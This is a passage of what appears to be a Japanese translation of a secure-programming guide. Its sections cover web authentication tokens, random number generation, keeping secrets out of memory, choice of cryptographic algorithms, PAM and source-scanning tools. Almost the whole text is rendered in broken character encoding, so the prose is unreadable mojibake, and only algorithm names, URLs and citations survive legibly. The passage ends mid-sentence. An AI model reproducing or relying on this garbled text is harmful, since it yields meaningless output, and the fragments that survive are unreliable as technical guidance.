H[ hidden tB[hƈÍNgđĂ(
΁ASSL  TLS)B

Fu [2001] ł́AWeb ɂNCAg̔F؂ɂĘ_Ă܂B
܂łɐ@ƕŁAقƂǂ̃TCgłE߂ł@ł
B̊{IȍĺANCAg̔F؂ɂ́uOC葱v
ǔɑvv2 ɕƂlłBOC葱
ł́AT[o̓[UɃ[UƃpX[h߁A[U͂
AT[o͂ɑ΂āuF؃g[Nvœ܂BNv
ŁANCAg(Web uEU)͔F؃g[NT[o (NGXgƓ
l)܂BT[o̓g[NȂ̂mFAȂ̂Ȃv
Ȃ܂B Seifried [2001]́AWeb ł̔F؂ɂ Fu [2001]ɕCG
łB

 

10.2.1. Web ̔F؁\\OC

OC葱͒ʏ HTML ̃tH[gĎĂ܂B̃tB[
hɂ́AuusernamevupasswordvK؂łBĂ΁AWeb
uEU͎Iɂ܂ɓĂ܂BpX[h́AK
ꂽʐMő悤ɂĂ(https g SSL  TLS 
pʐM)BȂƓlpX[hWłĂ܂܂B
pX[h͂eLXgtB[hׂ͂āApX[ĥ
č쐬ĂB΃pX[h̃eLXg̓[Uʂ
lNǂ߂ȂȂ܂B

[UƃpX[hĂɂ́A[UEAJEg̃f[^x
[X`FbNĂB̃f[^x[Xɂ́ApX[huv
ŕۑȂłBÑf[^x[XRs[Ă܂΁A
ԂɂׂĂ̐lԂ̃pX[hɓ܂(܂Ƀ[U͂
pX[hg܂킵܂)B crypt()gĕꍇ
Acrypt ͂Ƃ͂܂̂ŁAʂ̕@gp
邱ƂE߂܂(͎̉@ŁA Fu [2001]ł͂̓__
܂)B̂ɁA[UEAJEg̃f[^x[Xł́A[U
ƃTg(salt) ̃[Uɑ΂ẴpX[h̃nbVĂ
BTg̓_EV[PXȕŁAU҂pX[h̓f
[^x[X肵ƂĂApX[hôɂ邽߂
g܂B 8 ̃_EV[PXE߂܂B͈ÍI
_łKv͂܂B̃[UƂ͈lɂĂ
BpX[h̃nbV́Auserver key1vƃ[ŨpX[hAT
gȂČvZKv܂BvẐɂ́AÍIɈSȃnb
VASYp܂B server key1 ͔閧ŁÃT[o
Ɉӂɗ^ꂽ̂łB̌̓pX[h̃f[^x[XƂ͕ʂɂ
ĂĂBN server key1 ƃpX[h̓f[^x[X
ɓ΁AvO𓮂ă[ŨpX[hNbNł܂
BpX[hLĂKv͂܂̂ŁAĕGȂ̂ɂ
܂BłSȂ̂ HMAC-SHA-1  HMAC-MD5 łB SHA-1(SHA-1 g
Ƃŉ\ƂȂUAĂ Web TCgł͂قǐSzĂ
)  MD5(q MD5 ɂĂ̋c_Ă) pł܂B

̂悤ɁA[UAJEg쐬鎞ApX[h̓nbVA
pX[hf[^x[XւƓo^܂B[UOC悤
ƁApX[hƂē͂ꂽ̂nbVAf[^x[Xɂ
nbVƔr܂(Ȃ΂܂)B[UpX[h
ύX鎞ɂ́AÂ̂ƐV̗͂܂BVpX[h
 2 ͂܂(~X^CvȂ悤)B܂ŁApX[h
ʂɏoȂƂmFĂB

ftHgŁANbL[găpX[ĥNCAg̃uEU
ɕۑȂłB[U̓NCAgŗpĂ鎞
邩܂(Ƃ΁AC^[lbgJtF̂悤)B]ނȂA
[UɃuEUŁupX[hۑvI^邱Ƃł܂A
ȂApX[h͕KuSȁvڑ̓`ɂg悤ɂ
B܂[UpX[hۑ邱Ƃmɖ]ł邩m
FĂ(ftHgɂĂ͂܂)B

悭py[WăLbVȂ悤ɂĂBvN
VT[olɂ̃y[WȂ悤ɂĂB

[UOCɐȂAT[o̓NCAgɁuF؃g[Nv
NbL[őKv܂B̓_ɂĂ͎ŏqׂ܂B

 

10.2.2. Web ̔F؃OC̓

[UOCƁAT[o̓NCAgɔF؃g[NƂăNbL
[𑗂Ԃ܂Bg[N͉L̂悤ɂȂ܂B

  exp=t&data=s&digest=m                                                

t ̓g[N̗L(Ƃ΁A)data(Ƃ΁A[UZb
V ID)Adigest ɂ͌_CWFXg܂Budatav
tB[h͕ύXRŁAƂ킩₷O(Ƃ΁A username 
sessionid)ɂĂ܂܂)B_CWFXǵALÍ
nbVƃf[^ÂɂĂBf[^EtB[h
 2 ȏ゠Ȃ(Ƃ΁Ausername  sessionid )A_CWFXg
ɂ͔F؂Ă邷ׂẴtB[h̃tB[hƃf[^lg悤
ɂĂBp^ŘAĂ(u%%vu+vAu&
v)B܂̃p^f[^lƂĂǂ̃tB[hɂȂ悤ɂ
B_CWFXǵAHMAC-MD5  HMAC-SHA1 g悤ɂ
āAʂ̃T[ǒ(key2)pĂB key2 MłȂ
ANT[oŔF؂łȂȂ܂B key2 ύX̂͊ȒP
BύX́AuOCv[UɍĔF؂΂悢ł
Bڂ Fu [2001] ĂB

OC炸ƁAT[o͗LԂƂ̔F؂ɎgĂg[
Ñ_CWFXg`FbNĂBvꍇɂf[^
ĂBg[NȂ΁A[Uɂ̓OCy[WԂ
Ă(hidden tH[̃tB[hāAOC
ԂׂƂ\)B

ZbV ID F؃g[NɓƁAANZXɐł܂B
T[oZbVŃ[Uǂ̃y[WĂ邩uǐՁvł
B܂AĂ܂Ȃy[WɂANZXł܂(Ƃ΁A
̃y[W璼ڃNĂ̂Ƃ)BƂ΁A郆[
U foo.html Ƃy[Wւ̃ANZXF߂ĂāA foo.html Ƃ
y[Wɂ bar1.jpg  bar2.png Ƃ\[XwĂƂ낪
ƂāAbar4.cgi ւ̃ANZXۂł܂BZbV؂邱Ƃ
\łAF؏񂪐Ƃł(ȂƁAU҂l
΂ăT[rXۍU܂)BƂZbV̏ɐ
ƂĂAōU҂ĂANZX𑽏ȂƂł
܂BAU҂ɍU鎞ԂƔF؃g[N΁Aʏ탆[U
悤ɃNunvƂ\łB

ߏ́AF؃g[NKvȂ̂AƂSȐڑ(Ƃ΁ASSL)
f[^𑗂̂KvȂ̂AƂ҂ƂKvȂ̂AƂ_łB
F؃g[NÍ(Sł͂Ȃ)ƁAg[N肷
A[UƓƂL؂܂Ŏsł܂B܂AÍ
ĂȂڑŃf[^𑗂ƁA[UCtȂɍU҂f[^
ύXĂ܂댯܂B̂悤Ƀf[^NύXĂ܂
SzȂA`f[^ɔF؂Ȃ΂܂BÍ̂
F؂󂯎Ă킯ł͂܂񂪁Assׂ𔭌₷Ȃ
B܂\IȃCu TLS  SSL ňÍƔF؂𗼕ƂT|[
gĂ܂BʓIɁAbZ[WÍȂA̔F؂킹
čsĂBvقȂȂA 1 ̂ƂĔF؃g[N
 2 쐬@܂Bg[N 1 ́uSȁvڑs
AdvȑړIɂgp܂BЂƂ̃g[ŃA
قǏdvłȂɗp܂BuSȁvڑ̂߂Ɏgg[N
ɒӂ𕥂āASȐڑ(Í SSL  TLS ڑʓI)ɂ
gĂ悤ɂĂB[UĂȂAF؃g[N
uf[^vSɍ폜ĂB

JԂɂȂ܂AF؃g[NƂȂy[ẂAăLbV
Ȃ悤ɂĂBɂ育ȕ@܂B̃hL
g̍ŏIڕW͏ȂƂ 1 ASȉ@񋟂邱ƂłB\
ȉ@͂񂠂܂B

 

10.2.3. Web ̔F؁\\OAEg

uOAEgvdg݂[Uɒ񋟂ĂB̓uE
ULĎg[U(Ƃ΁A}ق)ɂƂĂ͓ɕ֗łBu
OAEgv郋[`̖ڂ͒PłBNCAg̔F؃g[N
΂悢łB

 

10.3. 

SKvȃvÓAU҂łȂu_ȁv()
܂܂ȏʂŐȂ΂܂BƂ΃_Ȑɂ́AZ
bV܂ތJ͔閧Ώ̌A܂܂ȃvgRŎgp
Ă nonce(̎Lȏ)⏉xNg(IV)Asalt Y
܂Bz΁A͐^Ƀ_łf[^ɂׂłB
̂悤Ȓlɂ́Aː(KCK[EJE^[̎G𐳊mɌv)
C̎GAdCH̔MG܂BRs[^ɂ́A{̗
Ƃċ@\n[hEFAi𓋍ڂ̂܂Bpł
̂Ȃ痘pĂB

AẴRs[^ɂ͐^ɗ𔭐n[hEFA͂
Ă܂Bŗ𔭐@KvɂȂP[XقƂǂł
B@́AU҂\złȂxɃ_łdg݂K
vɂȂ܂B 3 ̎dg݂KvɂȂ܂B

 E us\ȁvԁB჌x̃foCX(L[͂fBXNEhC
    ũA[̃Wb^())̕ωv邱ƂŎ܂BU
    ͂𐧌ł܂B
   
 E Ípɋ[(PRNG)B͓Ԃgāu
    _vȐ𔭐܂B
   
 E 傫ȃrbg(V[hƌʂƂĎgꂽl̗)Bgl킸
    ȂA͂ PRNG ĂĂʂłBŔAU҂
    U₷Ȃ邩łBKvɂȂrbg͊ɂ
    AÍƂĂpĂ̂ŁAoǍɂ̃[
    Kp܂BΏ̌(Ƃ̌)́AȂƂ 112 rbg(3DES)
    gpĂ܂B128 rbgg΁A܂ɂȂA160 rbgȏ
    SłB
   
ʏAPRNG ͓ԂgČ𐶐܂B̒l₻̑̐ł
͂gďԂXV܂B̎dg݂U@͂񂠂
܂BƂ΁AU҂Ԃւ̓͂𐧌䂵A肵ł
(Iɂł)AU҂́u_ȁvƊo
܂B

PRNG {Ɋ댯Ȃ̂́ARs[^̃Cȗ唼ɁA[
 (PRNG)Ă_ɂ܂B̓ZLeBpɂ͕sK
łBJԂ܂傤BWIȗZLeBpɗpȂ
łBWI PRNG Cu̓V~[^Q[Ɏg
̂ŁÂ悤ȃZLeB̃_\Ɏ
Ă܂BÍĂȂ PRNG CúAu`@p
vnAúv_Ȓĺu(aX+b)modmv(X ͈ȑO̒l)
ČvZ܂B`@pƂėDĂ΁AŗL
ȓvIAړIƂƂɂ҂蓖Ă͂܂܂B̂
 PRNG ̖_́AU҂X̒lȒPɐ_ł_ɂ܂
(_ɌꂽƂĂ)Bf񎟐O
̂悤Ȃ̑̃ASYĂ܂܂[Schneier 1996]B܂
ASKvȃAvP[Vł́AÍIɋł PRNG 𗘗pāA
𐶐Ȃ΂܂BʓIȗCuł͏\ł͂
B

pɐ^̗𐳂łȂƁA肪낢딭܂B
Kerberos  X Window SystemANFS ̃ZLeBz[ł[Venema
1996]B

ł邾AVXeɗpӂĂT[rXgׂł(ʓIɂ̓I
y[eBOVXepӂĂ)B̂悤ȃT[rX́AS
񋟂ł悤ɓɐ݌včĂ邩łBƂ΁ALinux
J[l(1.3.30 )͗ĂāAZLeBpɏ\Ή
ł܂B̗́A͂ŔmCYfoCXhCo⑼
̏񌹂WāAGgs[Ev[Ɏ߂܂B /dev/random ɃA
NZXƃGgs[Ev[ɂmCY琄肳ꂽrbg̔
͂łA_ȒlԂĂ܂(Ggs[Ev[̏ꍇ
A͂mCYW܂Ă܂ŁAĂяoubN܂)B /dev/
urandom ŃANZXāA傫ȒlvƁAGgs[Ev[g
ʂĂlԂĂ܂BÍ̖ړIŗpȂ(Ƃ
΃L[̐̂)A/dev/random gĂB BSDnVXe /
dev/random Ă܂B Solaris  SUNWski pbP[W /dev/random
pӂĂ܂Bn[hEFA̗킪p\ȂAhCoC
Xg[ĂɗpĂBɏڂ́AVXe
IC}jA random(4)QƂĂB

VXeɂẮA^Ƀ_Ȍʂ𓾂̂ɁA̎i{Ȃ
΂Ȃ̂܂B Unix CNȃVXeŉ\ȕ@ 1 
Entropy Gathering Daemon (EGD)܂B̃f[̓VXe̓
ĎāAnbVĂ痐ɂ܂B̃f[́A http:/
/www.lothar.com/tech/crypto 擾ł܂B PRNG ̏o͂ƂāAÍ
nbV@\(Ƃ΁ASHA-1)̗pĂ悢Ǝv܂BnbV
ASYg΁APRNG ̏o͂ł悤ɂȂƂĂAU
҂́AɃnbV@\ЂÂȂ΂ȂȂłB

ŋ͂ PRNG Ȃ΂ȂȂȂAÍIɋł(
ɒGȂ) PRNG ł Yarrow ASY̗p̂ǂł傤
BYarrow ɂĂ http://www.counterpane.com/yarrow.html łɒm
Ƃł܂B PRNG ɂ͑ɂ֗Ɏĝ܂ALp
Ă̂ɂ͊m̎_̂AAvP[Vɂ
͖ɂȂꍇl܂B PRNG ŎO [Kelsey
1998]  [McGraw 2000a]̂悤ȕ𒲂ׂĂB IETF RFC 1750
<http://www.ietf.org/rfc/rfc1750.txt> ׂǂł傤By
FIETF RFC 1750 ̓{́A http://www.ipa.go.jp/security/rfc/
RFC1750JA.html ɂ܂z

 

10.4. [UԂł͂Ƃ킯閧(pX[h⌮)

AvP[VpX[hJ(ZbV閧)Kv
ȂAJŏɂƂǂ߂邽߂ɁAgp͂ɏ㏑Ă
BƂ΁AJava ł String ^ɃpX[hۑȂłB
String ^͕ύXȂł(K[xWRNg邩Aėp
A㏑܂BȂɂ͎Ԃł傤)B String ^
̂ɁAchar[] găpX[hۑĂB΂
ɏ㏑܂B

܂AvÔ悤Ȕ閧̒lȂARA_v΍
悤ɂĂ(ulimit g)BȂƍU҂vO
fāA_vf[^閧̒lo܂B
1 ӂȂ΂ȂȂ_܂B́AʃvZXfobK
[ (Ƃ΁Aptrace(2)gA/proc ̋[t@CVXeg
肵)ĂяoƂŁÃvZXĎł_ł[Venema 1996]B
J[l͒ʏÃvZX setuid  setgid ĂƂ̂
ȊĎ[`vZXی삵܂(ÂJ[lł͕ی삪܂
Bی삷邽߂ɂ̓AbvO[h邵@͂܂)B܂Av
ZX閧̒lȂÃvO(ȂO[v⃆
[U)setuid  setgid āA̎̊ĎIɋ֎~
悤ɂĂB

 

10.5. ÍASYƃvgR

ÍASYvgŔAVXëSێ̂ɕKvł
BC^[lbĝ悤ɐMłȂlbg[NoRĒʐMꍇ
́AɕKvɂȂ܂Bł邾ÍZpgďF؂A閧
ێĂ(AÍF؂Iɂ܂sĂƁAP
Ɏv܂Ȃł)BʓIɂ́AK؂ȃc[găAvP[
VSɂKv܂B

܂ł̔wim肽΁AȃeLXgłuApplied
Cryptographyv [Schneier 1996]ǂłBusci.cryptvj[XO
[v́AFAQ 𒀎oĂ܂BŎɓ܂Ahttp://
www.landfield.com/faqs/cryptography-faq ɂ܂B Linux Encryption
HOWTO ܂ Linux ŗL̏񌳂 http://marc.mutz.com/Encryption-HOWTO
/ łBvgRǂ̂悤Ȋ{IASY𗘗pĂ邩ɂ
ẮA [Opplinger 1998]ĂBvgRɂǂĈÍKp
邩ɂẮAhLg̃RNVƂ [Stallings 1996]
܂Bł킸łA܂BeɂȂĂ܂
ŁALm肽Ȃ΁Aʂ̂ƂQƂĂB

ÍvgRÍASY𐳂͍̂Ȃ̂ŁA
ō낤Ƃ͂ȂłB̂ɁALpAO
͂ꂽvgRASY𗘗pĂBꂪSȂ
ƗĂBÍɊ֘Â쐬Ȃ΂ȂȂɂ́A
r[LJAZLeB͂̐Ƃ𒲍ł悤
Ȃ΂܂BÍ̐ƂŁAĂ邩cA
NăASY̐Ƃ̃r[󂯂v𗧂ĂȂ
΁AÍASY쐬悤ȂƂ͂ȂłB (炩
łɗ)ÍASY̍쐬́AƂɋꂽƂłB

ASY͓̑Ă܂BL҂up͎RvAƂ
_ŔF߂ĂƂĂA_񏑂ɏĂȂ΁AL҂̋C
ɂȂĕςāAőȃXNwƂɂȂ܂Bē
̂ASYׂ͂ĔĂBقƂǂǂȃP[XłA
ɒGȂ@܂B܂̉@́AȂƂ
̂ƓAȏɗDꂽZpgĂ܂BĂ
A@IȖ̐Xł܂B

 

10.5.1. ÍvgR

vgR͕WœKĂ SSL(܂Ȃ TLS ) SSHAIPSecAGnuPG
/PGPA Kerberos g悤ɂĂB@\̂͂ꂼ
ԂĂ܂Ấuӂ́vĂ܂B SSL(܂Ȃ
TLS)́A http(Web)̂ی삷@łB PGP ݊vg
R(PGP  GnuPG Ŏ)́A[݊ԂňSȓdq[
肷@łB Kerberos ͖{ALAN ŔF؂SɃT|[g
@łB܂A閧Ldg݂\z܂(܂AۂɒʐMی
ASY͕ʂɕKvɂȂ܂)B SSH ͂C^[lbgz
Ɂuꂽ[vSɂ@łBƂ΁Atelnet  X Window
System ̂悤Ȃ̂ΏۂɂĂ܂B̃f[^EXg[(CVS
ւ̃ANZX̂悤)SɂꍇɂǂgĂ܂B SSH v
gRɂ̓W[ 2 ̃o[W݂Ă邱ƂɒӂĂ
B܂̃^Cv̑I邱ƂɂӂĂB
͂ꂼ̃hLgQƂĂB OpenSSH ́ASSH 
I[v\[XŎ 1 łB IPSec ͂჌xŃpPbgu
ׂāvSɂ@łBāAzvCx[gElbg[
N(VPN)◣ꂽƂɂ}VSɂ̂ɕ֗łBC^[lb
gEvgR̐Vo[Wł IPv6  IPSec ugݍŁv
܂AʓI IPv4 ł IPSec ͓삵܂B

܂܂ȃvgRŁA낢ȃASYpł܂B
ăftHgƂāAK؂ȃASYIKv܂(Ƃ
AÍASY)B

 

10.5.2. Ώ̌̈ÍASY

ÍASY̗pAóAŋKĂP[XA
@͍XƉ肳܂BÍgăAvP[V\z悤Ƃ
OɁA@ǂȂĂ邩𒲍ĂB

閧(ȃf[^ł)̈ÍASÝAI[vɌJĂ
āAN̍Uɑς̂𗘗pĂB̏Ԃ
ĂBƂẮARijndahl ƂėL Advanced Encryption
Standard(AES)̗p𐄏܂B吨̈Í҂͂āAd
Ȏ_ȂƂ킩Ă܂B́Ał͏\ɐM
ɑƐMĂ܂B AES ̂ƂėDĂ̂́ASerpent A
SYłB̃ASY͏XᑬłAUɑ΂Ă
Ă͂łBAvP[V̑ɂƂāAtriple-DES ͔ɗDꂽ
ÍASYłBKx(112 rbg)A܂
AUɒNςĂт܂(JAKxȌ
ÍASY̒ŁAقǒԍUɑςĂ̂͑ɂ
܂)BAtriple-DES ̓\tgEFAŎĂƔɒᑬ
ŁAtriple-DES ́uSxvƎvĂ܂B Twofish ͗Dꂽ
ASYłAȂȂ^ʂ܂B́ASean
Murphy  Fauzan Mirza  Twofish ͂̊w҂L
AƂĂ_ł(̂ƂN̏LƂƂ͂Ă
܂)B MARS ́uV̎aVȁvUɑ΂ĒR͂͂łBA
蕡GŁAᐫ\ IC J[hőΉ͔̂񌻎IłB̂ƂA
 Twofish ̗p܂BŔAm Twofish ͌Ă邱
͂ȂƎv܂A݂mF̂łB݂
ȂASYɂ݂Ă܂̂ŁB IDEA ͎gȂł
BčƉB̓ɂ΂Ă܂B萔╶萔 XOR 悤Ȃ
̂ ROT(]uÍ)@rWlÍAlȂȃASYgȂ
łB݂͌̃Rs[^Ȃ킯Ȃj܂Budouble
DESv(DES  2 x)͎gȂłB triple-DES ł͋N
uman in the middle Uvɂ₷łBƂɂAvgR
̈ÍASYT|[gĂ悤ɂĂB
΁AÍASYĂA[U͕ʂ̃ASYɕύX
ł܂̂ŁBy󒐁Fuman in the middle UvɂẮA MITM
āH <http://www.vicus-oryzae.com/gorua/mitm.html> QlɂȂ܂z

Ώ̌̈Í(Ƃ΁AȈÍ)ɂ́A 2016 N܂Ŕ閧
ۂȂA90 rbg菬𗘗pȂł(Ƀrb
g𑝂₹΁Arbg 18 ZLeBێԂ܂)
[Blaze 1996]BقǏdvłȂf[^ÍȂAȑO炠
DES ASY𗧂ꍇ܂Bŋ߂̃n[hEFAȂ炢
ƂȒPɑU DES  56 rbgj܂B DES gĂ
ȂAƂ ASCII eLXggȂ悤ɂĂBpeB
ŉ(ŏʂł͂Ȃ)rbgɂ܂ADES ASY̑́AU
҂悭mĂ܂Ă錮lgĈÍĂ܂B̂A
̃nbV쐬AԈႢȂpeBErbgɐݒ肵Ă(Í
[`oG[bZ[Wɂ͒ӂ𕥂Ă)BAo
ÍASÝALȌ 40 rbgɂȂĂ܂B
ł͈Ӗ܂B 1996 Nɂ͍U҂ 10,000 h₵ 12
ł̂悤Ȍj܂ARs[^󂢂Ă鎞ԂgĐ
Ōj܂Bǂ̃P[XAĵ 18̔̎Ԃ
Ă̂ɂłB

ubNÍASÝA낢ȃ[hgĂ܂BƂ
Auelectronic code bookv(ECB)ucipher block chainingv(CBC)
B CBC 𗘗p̂ʓIłAECB [h͎gȂłB
ECB [hł́AXg[ŁAf[^ubNɓʂ
܂Bł͈Íꂽ̂Ȃ̂A\Ă悤Ȃ̂ł
B CBC [h܂ރ[h́AuxNgv(IV)KvƂꍇ
܂B IV 閧ɂKv͂܂񂪁AU҂\ł悤
͂܂BZbV܂ IV ėpĂ͂܂BZb
V͂߂xɁAV IV gĂB

Xg[ÍASY͂낢날܂A啔ɔ
܂BɈ炸AZpIɖ̖̂ɁAWAKE ܂B
RC4  RSA Data Security Inc ̊Ɣ閧łBRkĂ܂
ŁA̗pɌIȖ@IQƂ͎v܂B RSA ̗͂
p҂ɑ΂Ė@Iu{ƁA咣𑱂Ă܂(RSA ł邱Ƃ
Ȃ̂A͂肵Ă܂B[UӖȍٔɊ
\̂͋^悤܂)B RC4 gȂAoė
pĂB RC4 ŏ 256 oCg͐؂̂ĂĂ
BȂƐƎコ邱ƂɂȂ܂B SEAL  IBM 
܂BėpȂłB SOBER ɂ͓܂B
̏L҂́ApĂΎRɎgĂ܂ȂƂĂ܂
AX̗p̏QɂȂ܂Bɖʔ̂́A[hŃubNÍ
ASY𗘗pł_łBubNÍASYXg[
̂悤Ɉ܂BXg[Íg[ÚẢ@
Ă(ƍLJĂASYIԂƂł
)B

 

10.5.3. JASY

JÍ@(閧ɏA𑗂ꍇɓɗpĂ܂)ŁA
LpĂASY͂ق̂킸łBLpĂA
SYɁARSA ܂B RSA ̃ASYɂ͓܂B
͕čɌ肳܂A 2000 N 9 ɓ؂܂̂ŁAR
Ɏg܂BĐ̒l𕜍A肵ȂłBU
҂ RSA gĒڐ̒lnǍʂJ܂B邱Ƃ
A閧Jł邩ł(ۂɂ͖͂ɂ͂Ȃ܂BvgR
̑啔́A[UŌvZnbVɏ̂Ă邩
łB͐f[^ł͂܂B܂茋ʂ͌J܂)B܂
̒lA͐΂Ȃł(̒l
JĂ܂܂)BɑoɃ_ȃpfBOǉ
΁Ał܂(PGP ͂Ă܂)Bʂ̉@ Optimal
Asymmetric Encryption Padding (OAEP)ƌĂł܂B

Diffie-Hellman ASÝA2 ҊԂŃZbVv
ɍLpĂ܂Bꎩgł́A݂ɒNł邩̕ۏ؂͂
܂̂ŁA҂݂͑܂BAݕĥɂ́A
Ɍʂ܂B 1997 Nɐ؂܂B Diffie-Hellman g
L쐬ȂA͂߂ɕKnbVĂ (Ll𒼐
gU@݂܂)B

NIST  digital signature standard (DSS)J܂(ElGamal ÍVX
ẻǔłł)B͓dq̐ƔF؂ړIƂĂ܂BJ
 1 ɁA͎ȂAƂ܂B 

RSA  Diffie-HellmanAEl Gamal @́A\IȑΏ̌ƔׂāÃZ
LeB̂ɂɃrbgv܂B 1024 rbg 80
rbg̑Ώ̌Ƃ悻łB̍lł́Ãrbg͌ݕKv
ȍŒ჉CłBJ킸ȃrbgɂKvȂA
elliptic curve Í(ȉ~ȐÍ)𗘗pĂǂł傤(IEEE P1363 
͋ȐĂ܂BK؂ȋȐ͍̂ł)B
ӂׂ_܂Belliptic curve Íɂ͓͂܂񂪁A
̍Zpɓ_ł(elliptic curve Í͏\ɍŁA
͎̍ۂɕʂ̈ÍZbV⋐ȈÍ̗pɂ͕Kv
܂)B

 

10.5.4. ÍnbVEASY

nbVÍASYKvȃvO܂B܂uC
ӂ́vʂ̃f[^󂯎āAU҂t]̂ȌŒ蒷̐
֐ł (Ƃ΁AU҂ʂ̃f[^gāAl𐶐
̂Ȃ̂ł)BN MD5 {łAŋ߂̐ʂ MD5 
128 rbgł͂͂\łȂƂ܂[van Oorschot 1994]B
܂A̍U MD5 ̖h̉܂[Dobbertin 1996]BƊEgb
v̈ÍƂ MD5 jAٗp_̊֌WŒقĂAƂ\
ۂɂ܂(John Viega  Bugtraq  August 2000 N 8  22 ɓe
LĂ)B\͒Nł܂A_ȂɌ
Ă܂̂ŁAɔjƂ̂͂Ƃ炵܂BVR
[hȂAMD5 ̂ SHA-1 gĂBIWi SHA
(SHA-0 ƌĂ΂Ă܂) ͎gȂłB SHA-0  MD5 Ɠ悤
Ȏ_܂BnbVASYɂƃrbgKvȂA
SHA-256  SHA-384ASHA-512 gĂBdĺANIST  FIPS
PUB 180-2 ɂ܂B

 

10.5.5. ̊mF

ʐM鎞ɂ́A炩̐̃`FbNKvł(Íɂ
łBU҂ύXāAu_vȒlɂĂ܂܂)
`FbN̓nbVASYŎł܂BAڃnbV֐
gpȂł(ƁA[UugvUɂ炷Ƃɂ
܂BU҂nbVl𗘗pāAI񂾃f[^ǉAV
nbVvZUł)B@́Aʂ́uHMACvłBŐ
̃`FbN̂悤ɌvZ܂B

  H(k xor opad, H(k xor ipad, data)).                                  

H ̓nbV֐ł(ʂ MD5  SHA-1 ł)ŁAk ͌łB܂A
̊mF́AHMAC-MD5  HMAC-SHA-1 ɂȂ܂B MD5 ͎_
̂́A̍\ł͐Ǝ㐫͖ƎvĂ܂BāA
HMAC-MD5 (̍lł)肠܂Bڍׂ́AIETF RFC 2104 ɒ`
Ă܂B

HMAC ɂ@ł́AM҂M҂ƂȂēf[^Uł邱
ƂYȂłB͕iɂ͂Ȃ܂BȂ
΂ȂȂȂAJgāAM҂M҂̔閧Łuv
ĉBŋUɂU͉ł܂AԂĂ
܂܂BĂ̊ł͕Kvł͂܂B

 

10.5.6. ̑Í֘A̖

Íƃf[^̐o`FbNĂBꂪdvłBÍ
ɐ̃`FbNƂĂAɗĂ͂܂BU
rbgύXāAʂ̒lɂĂ܂܂B̒lɕύX
ȂƂĂA̒lύXł΂ŏ\łBʂ́A̍
U邽߂ɁAƔ閧ێɕʂ̌gĂB

\ɋc_łĂȂ 1 ɁugtBbŃv܂B
胁bZ[WÍÄÍjĂȂĂAU҂͈Í
bZ[W炳܂܂ȂƂĂ܂܂BƂ΁A2 
Ђ̎ВÄÍꂽdq[̃bZ[W肵͂
߂ƂƁA 2 ̉ЂĂ邩܂Bʂ̗Ƃ
āASSH ̎̑ɂ̓pX[h̎_邱ƂĂ܂
Bώ@҂̓pPbgāApX[h(͈͒̔)𐄑ł
BpX[ĥ͐łȂɂĂłB܂ApX[hɊ֘A
̑̏ł܂B̓pX[hĵɂȂ̎菕
ƂȂ܂B

Iɖ悤Ȑ^͂ȂłBMł(N
Mł邩)ωȂAʂ̌gĂB܂ɒԓ
gȂłB܂AZbVpX[h͕ύXĂ
B΁AU҂͐U肾ɖ߂Ȃ΂ȂȂȂ܂B

TĉÍȂ爳kׂłB͌Œ蒷̂փb_[
邱ƂɂȂAKǂƂ͌Ȃ̂łAbZ[W
̂ƓɁAbZ[W̎cɂ邢̃p^܂Bk
ʂȂ肻ȂAʂ́u܂vƍlĂǂł
傤B

֘AƂāAŒʐMvgR쐬Ȃ΂ȂȂȂAȑO
ǂȖ肪̂ĂB Bellovin[1989]̂悤 TCP/
IP vgR̃ZLeB̖_ÓTɗƎv܂B
Bruce Schneier [1998] Mudge ɂ Microsoft PPTP ̎j
₻̌̎lłBJԂ܂AVvgR͂ǂ
̂łAKLJăr[󂯂ĂBpł̂͗
pĂB

 

10.6. PAM g

Pluggable Authentication Modules(PAM)́A[U̔F؂_ɍsdg
łB Unix CNȃVXeɂ PAM T|[gĂ̂A
Solaris  Linux fBXgr[V̑唼(Red Hat Linux  Caldera
ADebian ̃o[W 2.2) FreeBSD 3.1 ŃT|[gĂ܂B PAM 
gƁAvOƔF؂̎dg(pX[h IC J[h)Ɨ
ɂł܂B܂AvO PAM ĂяoAPAM [JVXe
̊Ǘ҂ݒ肵e`FbNAǂ́uF؃W[vKv
^Cɔf܂BF؂KvƂȂvO(Ƃ΃pX[h
͂)쐬ĂȂA PAM ̗pׂłB Linux-PAM vWFN
gɂẮA http://www.kernel.org/pub/linux/libs/pam/index.html 
ĂB

 

10.7. c[

ZLeB̖AŌʂoOɌoc[݂
BAׂĂ̖킯ł͂܂񂪁AIŌ
ƂȖĂ܂Bł́AI[v\[Xƃt[\
tgEFAɏœ_𓖂āAc[Љ܂B

c[̃^Cv 1 ́A\[XR[h𒲂ׂāAZLeBɂȂ
Ȋm̃p^vOł(Ƃ΁A炩̎iŃC
u֐ĂяoƂAZLeB̐Ǝ㐫ɂȂ܂)B
̃vÓu\[XR[hEXLivƌĂ΂Ă܂Bł
Љ܂B

 E RATS (Rough Auditing Tool for Security)́ASecure Software
    Solutions ɂ̂ http://www.securesw.com/rats 擾ł
    B̃vO C  C++ ̃\[XR[hɂ悭X
    L܂BCZX GPL łB
   
 E Flawfinder ͎ĴŁA http://www.dwheeler.com/
    flawfinder 擾ł܂B C  C++ ̃\[XR[hɂ悭
    XL܂BCZX͂͂ GPL łB RATS Ƃ̈Ⴂ
    ́APython ŎĂ_łB RATS  Flawfinder ̊J҂́A
    ōőP̑gݍ킹̃vOI[v\[XŎYݏoƂɍ
    ӂĂ܂B
   
 E ITS4  Cigital(O Reliable Software TechnologiesB RST)ɂ
    ̂ŁAÓI C  C++ ̃R[h`FbN܂BpɎg
    ȂΎRɗpłA\[XR[hpł܂BCĔzz
    \łBÁuI[v\[Xv` Open Source
    Definition <http://www.opensource.org/osd.html> (OSD)Ń[X
    킯ł͂܂B OSD  6 Ԗڂ̊I[v\[X
    CZXƂāupړIł̗p̋֎~v֎~Ă܂B
    ITS4  http://www.rstcorp.com/its4 擾ł܂B
   
 E LCLint ͐ÓI C vO`FbNc[łBԂقƂ
    ǂȂĂALCLint ͗Dꂽ lint Ƃėpł܂Bɓw
    ăvOɒ߂΁ALCLint ͕WI lint sǂ
    `FbN苭͂Ƀ`FbNs܂BƂ΁Aobt@I[o[t
    [N肻ȂƂÓIɌôɗpł܂B\tgE
    FÃCZX GPL ŁA http://lclint.cs.virginia.edu 擾
    ł܂B 
   
 E cqual ͌^x[Xŕ͂c[ŁAC vÕoOo
    ܂Bcqual  C ̌^VXegāAɃ[U`̌^Cq
    ǉĂ܂BƂ΁AutaintedvuuntaintedvƂ悤
    lLqł܂(Perl ̉`FbNƎĂ܂)BvO}̓v
    Oɉ߂ cqual ͏Cq琄_sACq
    K؂ǂ`FbN܂Bcqual ͕͌ʂ Program Analysis
